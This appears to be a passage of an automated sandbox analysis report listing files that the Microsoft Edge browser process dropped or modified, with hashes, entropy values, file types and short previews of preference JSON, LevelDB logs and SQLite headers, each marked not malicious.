                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.048010663779472336
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:uF+SzM0ctkfE1Bs7hVSoUU3908T2RGOD:PTtkcwX1UU3sRGO
                                                                                                                                                                                                                                                                          MD5:0EC5D6A9E43F9F627392709CAAB726A1
                                                                                                                                                                                                                                                                          SHA1:9517BBBEBFEE2F117B2A5B8C76022A545D875511
                                                                                                                                                                                                                                                                          SHA-256:D1226EB7B4353E0F9CC1C73AF5430993C80243838AB024CF4BC0C0D3112538D8
                                                                                                                                                                                                                                                                          SHA-512:8C22A48649B84E281BFC29C3CFCD28B54FF65315E4CDB44C55385E18504B6CE9D8D1D758CF523A8343D41CDEC3C1CC31057626811F36DF97569583D089981C92
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.449600896753413
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:nL2hmwmkM5bxCZZrDLq3tSeWmDxpXjaH:f5bMZIRC
                                                                                                                                                                                                                                                                          MD5:66ADF0A69038F80BBF161B172FD001C5
                                                                                                                                                                                                                                                                          SHA1:03A8F6F13D5B0F26789F187DD37D1EA06E8CEF32
                                                                                                                                                                                                                                                                          SHA-256:538D6AD856573EFBA484E252D8F598D9489CA84B7C184DFEEA3714530013967A
                                                                                                                                                                                                                                                                          SHA-512:B84948C0817785CD5F457D38D97AFFFCCA23ED606D8CF732BB41B70C4AA2CEA067B419C2F8F4C2BEB6B1D2BF26B1DD58E9E6CF27B3F28F7BE6258D4EA46D1165
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                          Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                          MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                          SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                          SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                          SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17417), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17427
                                                                                                                                                                                                                                                                          Entropy (8bit):5.497864803972673
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17582), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17592
                                                                                                                                                                                                                                                                          Entropy (8bit):5.494550122767918
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                                          Entropy (8bit):5.249427040297509
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvkk1CHhJ23oH+Tcwtp3hBtB2KLl5v3VylL+q2PCHhJ23oH+Tcwtp3hBWsIFUv:7BYebp3dFLFTvBYebp3eFUv
                                                                                                                                                                                                                                                                          MD5:958039B6C92EE3CE2B21A23AD6834E55
                                                                                                                                                                                                                                                                          SHA1:78B0CB1C25527F418424B7C6C377C117DA02F07B
                                                                                                                                                                                                                                                                          SHA-256:0AC1C650B778136E4692A9C20E38A82D067E19B5C9DD8EA0E9C5513721F618F1
                                                                                                                                                                                                                                                                          SHA-512:C61DEA8F87CDDFC76BABA02A0960270477B214DBB16BF0EDC02A299E2602C5D1629AB04954BF8EB7CBD990D22DF1CCBB21BB410BDE37B2846890288D111AE357
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:41.996 1a98 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:55:42.015 1a98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):1764710
                                                                                                                                                                                                                                                                          Entropy (8bit):5.138103609826128
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:hKPVfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hK9fqJmcx
                                                                                                                                                                                                                                                                          MD5:2D0BDDE399EB2A86A02E443CC9C08DB9
                                                                                                                                                                                                                                                                          SHA1:C90E0ED548B7352C5A6149FFA4F9CF73387855A3
                                                                                                                                                                                                                                                                          SHA-256:1D39B9CD312A8A491C5BBA0599D7FCCFD02D59C6CDA1E89B3C75FB9B8FA7F791
                                                                                                                                                                                                                                                                          SHA-512:5128FB314664B989707EE85AB0C392B0807777C191C0DF9071A2D3D4930F07AD74A9FF23674B86341C35A104CF9F85A544F5F9F0CF6F3440B4B763EEB68FF927
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1488263651458555
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv3A+q2PCHhJ23oH+Tcwt9Eh1tIFUtJv3vWZmwPv3DVkwOCHhJ23oH+Tcwt9Er:7c+vBYeb9Eh16FUttW/zV56Yeb9Eh1VJ
                                                                                                                                                                                                                                                                          MD5:5242639577429B7DFE07E05372FD0A2E
                                                                                                                                                                                                                                                                          SHA1:6AC151C64D3CFA3078BA4E5F03099BCE8DD1F053
                                                                                                                                                                                                                                                                          SHA-256:25F397034840CE8ED63B5C66B5B90D0D7118F82B6558B8C3FAA731492918D207
                                                                                                                                                                                                                                                                          SHA-512:477340F93B664C46E986D320DC1E626CE3CC666F9C53634732E9628D8F17B6B89B29F5E9C2973E5E1FEF04F08E3A06AE662B998DC92034D8E925CE6C10B60885
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:42.313 19ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:55:42.315 19ec Recovering log #3.2025/01/09-08:55:42.341 19ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):0.46312689327721746
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuy:TouQq3qh7z3bY2LNW9WMcUvBuy
                                                                                                                                                                                                                                                                          MD5:4EC0D17D4792B6D6732478F6F5527A1D
                                                                                                                                                                                                                                                                          SHA1:8C5D45A173D5423584CBD819792DA901796766C2
                                                                                                                                                                                                                                                                          SHA-256:839BBD0B3524E0131D963CF4C129D1ACCF25CA94B4E54192A5730C4194F087C8
                                                                                                                                                                                                                                                                          SHA-512:854875AA5918B79AE8ED5CCD99F436B9E2FE3E89D2BA19D6739C66D6B3E27BF331C7A5796C0AFD6134DD975ADE2702EB6E5C5B67C5B766D7856B41EEAC6754B2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                          Entropy (8bit):5.250284738882366
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrvW1L+q2PCHhJ23oH+TcwtnG2tMsIFUtJvWj1ZmwPvIDwLVkwOCHhJ23oH+Tci:7i1yvBYebn9GFUtwJ/o8R56Yebn95J
                                                                                                                                                                                                                                                                          MD5:CEC05A59E94FD5A04C992E384220A361
                                                                                                                                                                                                                                                                          SHA1:0EC9E16CE3346A004BA882F2A095A4F7B2B9C348
                                                                                                                                                                                                                                                                          SHA-256:146E866635821F1CD568A9F21497B6EE965A4C55B20F01CCBCDE53D5611514DA
                                                                                                                                                                                                                                                                          SHA-512:EF42E10B6E5FB5D921E2DE667FE2C0CA2E6AF667DA533A1F974701937F7DADD512A0ABB504982FE446C476C6E91731D2A9C452354D0659EE480E38CBFB85B6A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:35.756 f18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:55:35.756 f18 Recovering log #3.2025/01/09-08:55:35.757 f18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.6135653564275771
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jkTzJtpcVTdmL:TO8D4jJ/6Up+wJ4V+
                                                                                                                                                                                                                                                                          MD5:762BBE0962EAF458B96D11CF44B06B78
                                                                                                                                                                                                                                                                          SHA1:20C292BB1619963140543F76B38D08D8ED7B73F0
                                                                                                                                                                                                                                                                          SHA-256:94643CAC9459959D042F8533C7E78481389D5DF462704EBD3627A21AC5CFC4DF
                                                                                                                                                                                                                                                                          SHA-512:BF8E00AB6A1E2243A0FAE43BBBC0254ADEF83AABFABAF8195E2406C0F809B052446668EA1095FB2A2AFD4349F9DBB59D7BD4828CAFD31A54D1E0E9211F3FAF81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3541564020274395
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:sA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:sFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                          MD5:3DD277646EA26125C3278BA1C4EBD049
                                                                                                                                                                                                                                                                          SHA1:EBA05FCEA7E27E57C5A2F88CE0D860F0CD4DF25A
                                                                                                                                                                                                                                                                          SHA-256:B56E1EE97E32894797FFAF7F57654D70DDEDC8681540B6C451FF7E4D99E81A53
                                                                                                                                                                                                                                                                          SHA-512:DBB874F4251698EED5BFF8DA4E8EAF65C4FD6B497852B53023C67921000975C7D870DBE15B85AA7F9B6E7DD550486AFA274B53A1326799CAB7F00484F54FD24B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380904544388598..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
